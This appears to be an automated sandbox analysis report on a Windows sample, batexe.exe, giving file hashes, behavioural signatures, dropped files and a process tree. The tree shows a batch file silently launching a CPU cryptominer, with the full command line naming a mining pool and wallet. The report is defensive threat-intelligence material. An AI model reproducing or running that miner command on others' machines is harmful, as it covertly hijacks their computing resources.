Analysis
-
max time kernel
299s -
max time network
304s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
21/02/2024, 02:11
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 2148 b2e.exe 2492 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 2492 cpuminer-sse2.exe 2492 cpuminer-sse2.exe 2492 cpuminer-sse2.exe 2492 cpuminer-sse2.exe 2492 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/4904-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4904 wrote to memory of 2148 4904 batexe.exe 85 PID 4904 wrote to memory of 2148 4904 batexe.exe 85 PID 4904 wrote to memory of 2148 4904 batexe.exe 85 PID 2148 wrote to memory of 404 2148 b2e.exe 86 PID 2148 wrote to memory of 404 2148 b2e.exe 86 PID 2148 wrote to memory of 404 2148 b2e.exe 86 PID 404 wrote to memory of 2492 404 cmd.exe 89 PID 404 wrote to memory of 2492 404 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4904 -
C:\Users\Admin\AppData\Local\Temp\6DA9.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\6DA9.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6DA9.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7AD8.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2492
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.3MB
MD521370f960e516e529e3374acb341d2ba
SHA136a6e05cecec7d8e8abad2a4209f1631c0c187e5
SHA256d6f9bd5b8b679d0e283ad4ef6823512ac48ebd6c45c588e84718230cc97d54cb
SHA5129abf2592489f1194f06ce0064a70e51116ea289cbfaaa157737a5adfd0b45bdc1638b2dd9c39187c07c455cf9b82ecec7a463ab102be8c760ffb840679a6cd18
-
Filesize
2.3MB
MD57a0a581615ec5b248c5006bfabe57117
SHA1981ea0f34d70646c18be9c9c59873f46a5c89816
SHA25609b79eb2ab2f1483f54536fb58e4a06402128629971cb9dac46d5d8a2ba04ebb
SHA51213b6d0d98f090008933007caa1263daa40036ec8054a208d163a6383aece84b89660efcdc36198799c8e9aaca9296533fbe881788db860ed706ecae284da22e7
-
Filesize
2.5MB
MD517426e4da15ee9371ff36ae5e88c8fdd
SHA10ac7984792a2569cf7df5299abbfe559a0871eb1
SHA256f77f718567dc0276d148754a7597126c84d144737db0aff4ffb7666e90ad2980
SHA51270ec35c71282af6a1a34c1c07d5b5f825bde9727ad7c4200f8745743f6e9f6937022e4af5a5059c7d7b6bf6004936eda6b298d2bee9990ec49992a7d891bfe07
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
741KB
MD5fba4c0ce9aa0fe67d5c6e9e453aabf40
SHA17f35d71657874537eb80a6c6b7b22b1e0e306109
SHA25600219768cf5b42fa87a9b69c7d9f2be0d9ea77327ebdaf03913666843cc6818e
SHA5129d36d782771e9e7b658cd5914706269cf95c0080a5cc3dfb0ecd83dbe5716828eb919567a9ea42be54cd8fdd8bed152e0490e11791eb57e2db430c690b783b41
-
Filesize
428KB
MD52b547104d38c82d0cb6ce5a883c9c1f3
SHA18216f92fdac3d80b8767d4a9de408efad3c084a9
SHA2561312d5fe1ed9f1786a06fa2972cbb2aa3c142c172a5700bb6a5da79b85065a97
SHA5128d0e455b2f8895a61c3c6321e51c1c521d83c092f92e9161a31a7fc315886e1021553f81e6096d78cc1d5d4283e7fdd197b1761e41140daa6d5facc47db827fc
-
Filesize
350KB
MD5bd38ca77d9ec3bc92b2571890b62516a
SHA134e801df216f11bdf937192892ddcd6befcc53cf
SHA25684a725b02d23803606e60950a6fe6bdab9e48f4c56b5f8cc7a31b46fa35ab7c0
SHA5123ad63d3ae18b15a3a85a0e4be39841f7ff126f4de813f7f5d0c315cfc50c2b5d118d031b09c616b0ada34ea0d2969ac984e983f86d498de7315ce122a6c2ebb8
-
Filesize
814KB
MD56438d965b55fdb1cdb7803a98aeb7c89
SHA13d49669ea48f39a67b8daf77c0cad2d21b06c3ca
SHA256e7b39e6692f9d6489325fddfafc1ee5232e6906b63e1107754f8ac248aa4b2fe
SHA51257b0b26f961f6ef559339bc8a5a3613b0ffe7f04200ca0145064d58425a8bdf8e1eae92b5714ac6cb11c8e0db9a92969d49e7364a5918eaf377502f38cb21509
-
Filesize
1.1MB
MD5debfac441a3cd55cc416a70a2e2bbf7e
SHA15715c2a6788756477f5b6fb735fc0784313c48d4
SHA25668e5ccfe26b4e0eec8d094425607967633b374ed2ad796ae36aea05963f79b3e
SHA512145de3f4a1fe3715e0c6c50dc2806c50c4c1b95488816e9cc97602d54a84210bdf49cc5f908a59926e155041c89cea744563b67005293a089732a7eb8db40de4
-
Filesize
455KB
MD55b70c6fc99d580c67c114113707aea72
SHA179cc837d0de226a6a01ea01ab0d247cdcbeb8eea
SHA25646e7c5a04892728131eea469a154962eea8d3300aea54a84def006d66317b8e4
SHA51263e17f77ea130486924d41ff1b8665ffdb724c6fb82e5cfe66a5e817f6ed7671790cf68c9b2c89ed0d544e37819bbb0a5c45eddc53f129fc612fb27861bdb0e7
-
Filesize
403KB
MD53895b8881032e8fb024ae6a103cebdf3
SHA18dccebb93ade3760a3bd9f23f6f769d3860d7dc9
SHA256551ae6c46567258c9afb6a80851fe1882d7589c1c81bdf3088b4231f20384739
SHA512465991a33e8fef44f54cac61ae16b7198fe930245f071bc0ca65ace8a3df61eb1572e0daced179d7aff1757b203cfc167e93fa7afd0d456e896c076f50646bc1
-
Filesize
531KB
MD571998eb9b29ebc1cb99a6cc72be73183
SHA16eb764d628bb64dc59b52c5a13f5a5fe66097fdf
SHA25656bb5649f9fe1e73b036ee460a858ba21518d629fc8bb58a761cd11192942f51
SHA51201fc27322caf3c6a20c0c62eb23c2fc6285b24a2e0ed1ee8be01502d01586e0279afc50fbf5d896f920786ebae23baa6e3a51e43e0602c8cbb4c44aed330bbbd
-
Filesize
424KB
MD5c2b09f3e1a6797933ae427a5a0e2cfda
SHA100b7645e8b6f31cf45106b0a281597631ee3c372
SHA256be690c581ec96a48b26ad5fc569384b284be383feaf93ddfe579ac4e382dc80c
SHA51299fe1d27a1109a610e57ef2a089f191a325c5cbc5e89ed45ff906611f8af494702c51eb5979986f0eb2121b05ac5e58ec16433318672210d759983f0579782dc
-
Filesize
591KB
MD5a98b132fa2cd210358920e315b24318c
SHA1fb791005b51af3e4642cae757619e0634bc35966
SHA256666cdbc1ba2eeb08cbe24067406a1c1b4299cf9f09191cb1f3a42754e8ec6e30
SHA512cb4a19e03721ce09ce52166f345b1624fb9d18abdb7c1fe5aa6d362bd1b55d034162a66ffd1186764f26dd9f51ce268240c9dd67140b1f1c0ef81fbaf39d341a
-
Filesize
540KB
MD5db360be61a5d2a76a4c76b3fb8b133f7
SHA17823f5409b7281915f02fe60d8d4541a56c7c0f9
SHA256341a7262cf48fd6fdb2a98d83da80da88f0f99a97c9099fafb7e41f0fcca4f27
SHA51208bdd0e5f49a5c937229d6fe725f88bc2aebbe02ffd7ed591760c6179965f92745866c6619a27ad4e0eaf7ff62799b6ca2b8b982c490e408842e6d38fca6cbc2